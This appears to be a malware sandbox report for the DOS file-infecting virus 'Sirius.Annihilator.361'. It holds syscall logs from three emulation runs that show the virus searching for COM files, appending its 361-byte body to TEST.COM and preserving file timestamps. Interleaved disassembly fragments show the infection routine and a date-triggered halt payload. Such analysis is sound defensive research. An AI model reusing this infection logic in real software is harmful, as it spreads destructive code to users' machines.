Sample viewer

vx.netlux.org/Virus.DOS.Sirius.Annihilator.361

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:22:35.171086685Z	26	PC: 15178 \| Set disk transfer address
2018-12-17T22:22:35.173072125Z	78	PC: 1518c \| Find first file
2018-12-17T22:22:35.187384668Z	61	PC: 15199 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:22:35.1951016Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.197429437Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.200676646Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.20475218Z	61	PC: 15199 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:22:35.218650162Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.221196502Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.223444173Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.22645378Z	61	PC: 15199 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:22:35.234737716Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.236387494Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.238700281Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.242023342Z	61	PC: 15199 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:22:35.250123922Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.252088715Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.254425252Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.258149732Z	61	PC: 15199 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:22:35.265821347Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.267781929Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.271124494Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.273947786Z	61	PC: 15199 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:22:35.281962538Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.284336059Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.286690022Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.28987987Z	61	PC: 15199 \| Open file (Filename = 'PAH.COM')
2018-12-17T22:22:35.298027081Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.30077855Z	62	PC: 151c0 \| Close file
2018-12-17T22:22:35.303198211Z	79	PC: 1518c \| Find next file
2018-12-17T22:22:35.306497523Z	61	PC: 15199 \| Open file (Filename = 'TEST.COM')
2018-12-17T22:22:35.314447189Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.316015863Z	87	PC: 151b0 \| Get or set file date and time
2018-12-17T22:22:35.31772875Z	44	PC: 151d0 \| Get time 0x151d0: or dx, dx 0x151d2: je 0x151cc 0x151d4: mov word ptr [bp + 0x26b], dx 0x151d8: mov ax, 0x4200 0x151db: call 0x15257 0x151de: mov ah, 0x3f 0x151e0: lea dx, word ptr [bp + 0x216] 0x151e4: mov cx, 3 0x151e7: int 0x21 0x151e9: mov ax, 0x4202 0x151ec: call 0x15257 0x151ef: sub ax, 3 0x151f2: mov word ptr cs:[bp + 0x214], ax 0x151f7: lea si, word ptr [bp + 0x105] 0x151fb: mov di, 0xfb90 0x151fe: mov cx, 0x169 0x15201: cld 0x15202: rep movsb byte ptr es:[di], byte ptr [si] 0x15204: mov si, 0xfbb1 0x15207: call 0x25161
2018-12-17T22:22:35.320819863Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.322356815Z	63	PC: 151e9 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:22:35.329838671Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.33272927Z	64	PC: 15214 \| Write file or device (Write 361 bytes on handle 5)
2018-12-17T22:22:35.339894335Z	66	PC: 1525d \| Move file pointer
2018-12-17T22:22:35.341239345Z	64	PC: 15225 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:22:35.351427473Z	87	PC: 1522c \| Get or set file date and time
2018-12-17T22:22:35.353320848Z	62	PC: 15230 \| Close file
2018-12-17T22:22:35.366981383Z	42	PC: 15234 \| Get date 0x15234: cmp dh, dl 0x15236: jne 0x1524b 0x15238: mov ah, 0x2c 0x1523a: int 0x21 0x1523c: and dh, 7 0x1523f: jne 0x1524b 0x15241: mov ah, 9 0x15243: lea dx, word ptr [bp + 0x21f] 0x15247: int 0x21 0x15249: cli 0x1524a: hlt 0x1524b: mov ah, 0x1a 0x1524d: mov dx, 0x80 0x15250: int 0x21 0x15252: mov ax, 0x100 0x15255: push ax 0x15256: ret 0x15257: xor cx, cx 0x15259: xor dx, dx 0x1525b: int 0x21
2018-12-17T22:22:35.369648359Z	26	PC: 15252 \| Set disk transfer address
2018-12-17T22:22:35.372108681Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-17T22:22:35.374014211Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-17T22:22:35.383261133Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3957,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:31.480000234Z	26	PC: 15178 \| Set disk transfer address
2018-12-25T11:50:31.488264885Z	78	PC: 1518c \| Find first file
2018-12-25T11:50:31.495726285Z	61	PC: 15199 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:31.503978695Z	66	PC: 1525d \| Move file pointer
2018-12-25T11:50:31.506404437Z	62	PC: 151c0 \| Close file
2018-12-25T11:50:31.509078579Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.512253093Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.520683288Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.523603612Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:31.525995141Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.529245176Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.53751474Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.539395066Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:31.541751214Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.558891227Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.566559765Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.568483799Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:31.571782701Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.575865006Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.584033872Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.586202316Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:31.590385141Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.593543571Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.601942927Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.604647716Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:31.607020363Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.610165294Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.619717325Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.621783332Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:31.624254768Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:31.628036845Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:31.635320863Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.637121731Z	87	PC: 151b0 \| Get or set file date and time
2018-12-25T11:50:31.639646865Z	44	PC: 151d0 \| Get time 0x151d0: or dx, dx 0x151d2: je 0x151cc 0x151d4: mov word ptr [bp + 0x26b], dx 0x151d8: mov ax, 0x4200 0x151db: call 0x15257 0x151de: mov ah, 0x3f 0x151e0: lea dx, word ptr [bp + 0x216] 0x151e4: mov cx, 3 0x151e7: int 0x21 0x151e9: mov ax, 0x4202 0x151ec: call 0x15257 0x151ef: sub ax, 3 0x151f2: mov word ptr cs:[bp + 0x214], ax 0x151f7: lea si, word ptr [bp + 0x105] 0x151fb: mov di, 0xfb90 0x151fe: mov cx, 0x169 0x15201: cld 0x15202: rep movsb byte ptr es:[di], byte ptr [si] 0x15204: mov si, 0xfbb1 0x15207: call 0x25161
2018-12-25T11:50:31.643761042Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.645659617Z	63	PC: 151e9 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:31.649491163Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.651495672Z	64	PC: 15214 \| Write file or device (Write 361 bytes on handle 5)
2018-12-25T11:50:31.65538897Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:31.65812719Z	64	PC: 15225 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:31.66185895Z	87	PC: 1522c \| Get or set file date and time
2018-12-25T11:50:31.663893948Z	62	PC: 15230 \| Close file
2018-12-25T11:50:31.678894779Z	42	PC: 15234 \| Get date 0x15234: cmp dh, dl 0x15236: jne 0x1524b 0x15238: mov ah, 0x2c 0x1523a: int 0x21 0x1523c: and dh, 7 0x1523f: jne 0x1524b 0x15241: mov ah, 9 0x15243: lea dx, word ptr [bp + 0x21f] 0x15247: int 0x21 0x15249: cli 0x1524a: hlt 0x1524b: mov ah, 0x1a 0x1524d: mov dx, 0x80 0x15250: int 0x21 0x15252: mov ax, 0x100 0x15255: push ax 0x15256: ret 0x15257: xor cx, cx 0x15259: xor dx, dx 0x1525b: int 0x21
2018-12-25T11:50:31.682240819Z	44	PC: 1523c \| Get time 0x1523c: and dh, 7 0x1523f: jne 0x1524b 0x15241: mov ah, 9 0x15243: lea dx, word ptr [bp + 0x21f] 0x15247: int 0x21 0x15249: cli 0x1524a: hlt 0x1524b: mov ah, 0x1a 0x1524d: mov dx, 0x80 0x15250: int 0x21 0x15252: mov ax, 0x100 0x15255: push ax 0x15256: ret 0x15257: xor cx, cx 0x15259: xor dx, dx 0x1525b: int 0x21 0x1525d: ret 0x1525e: jmp 0x17ad7 0x15261: jmp 0x17971 0x15264: sub ch, byte ptr [0x6f63]
2018-12-25T11:50:31.68493518Z	26	PC: 15252 \| Set disk transfer address
2018-12-25T11:50:31.688784324Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-25T11:50:31.69233198Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-25T11:50:31.704390825Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3957,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:32.463871008Z	26	PC: 15178 \| Set disk transfer address
2018-12-25T11:50:32.465425255Z	78	PC: 1518c \| Find first file
2018-12-25T11:50:32.471101937Z	61	PC: 15199 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:32.477361978Z	66	PC: 1525d \| Move file pointer
2018-12-25T11:50:32.479631563Z	62	PC: 151c0 \| Close file
2018-12-25T11:50:32.481691129Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.484470847Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.496737164Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.498211207Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:32.49991837Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.502497334Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.509430241Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.510712525Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:32.512397686Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.515573843Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.522242533Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.523927199Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:32.526785611Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.52974525Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.536149887Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.538477379Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:32.540255614Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.542733443Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.549501094Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.550869065Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:32.552526232Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.555326632Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.565649004Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.566793557Z	62	PC: 151c0 \| Close file (See above)
2018-12-25T11:50:32.568872171Z	79	PC: 1518c \| Find next file (See above)
2018-12-25T11:50:32.571007805Z	61	PC: 15199 \| Open file (See above)
2018-12-25T11:50:32.577870519Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.579834174Z	87	PC: 151b0 \| Get or set file date and time
2018-12-25T11:50:32.581977393Z	44	PC: 151d0 \| Get time 0x151d0: or dx, dx 0x151d2: je 0x151cc 0x151d4: mov word ptr [bp + 0x26b], dx 0x151d8: mov ax, 0x4200 0x151db: call 0x15257 0x151de: mov ah, 0x3f 0x151e0: lea dx, word ptr [bp + 0x216] 0x151e4: mov cx, 3 0x151e7: int 0x21 0x151e9: mov ax, 0x4202 0x151ec: call 0x15257 0x151ef: sub ax, 3 0x151f2: mov word ptr cs:[bp + 0x214], ax 0x151f7: lea si, word ptr [bp + 0x105] 0x151fb: mov di, 0xfb90 0x151fe: mov cx, 0x169 0x15201: cld 0x15202: rep movsb byte ptr es:[di], byte ptr [si] 0x15204: mov si, 0xfbb1 0x15207: call 0x25161
2018-12-25T11:50:32.583972622Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.585183433Z	63	PC: 151e9 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:32.591806179Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.593206422Z	64	PC: 15214 \| Write file or device (Write 361 bytes on handle 5)
2018-12-25T11:50:32.599954534Z	66	PC: 1525d \| Move file pointer (See above)
2018-12-25T11:50:32.601396663Z	64	PC: 15225 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:32.604061003Z	87	PC: 1522c \| Get or set file date and time
2018-12-25T11:50:32.605389876Z	62	PC: 15230 \| Close file
2018-12-25T11:50:32.618043651Z	42	PC: 15234 \| Get date 0x15234: cmp dh, dl 0x15236: jne 0x1524b 0x15238: mov ah, 0x2c 0x1523a: int 0x21 0x1523c: and dh, 7 0x1523f: jne 0x1524b 0x15241: mov ah, 9 0x15243: lea dx, word ptr [bp + 0x21f] 0x15247: int 0x21 0x15249: cli 0x1524a: hlt 0x1524b: mov ah, 0x1a 0x1524d: mov dx, 0x80 0x15250: int 0x21 0x15252: mov ax, 0x100 0x15255: push ax 0x15256: ret 0x15257: xor cx, cx 0x15259: xor dx, dx 0x1525b: int 0x21
2018-12-25T11:50:32.620393113Z	26	PC: 15252 \| Set disk transfer address
2018-12-25T11:50:32.623252493Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-25T11:50:32.626517755Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-25T11:50:32.638719678Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')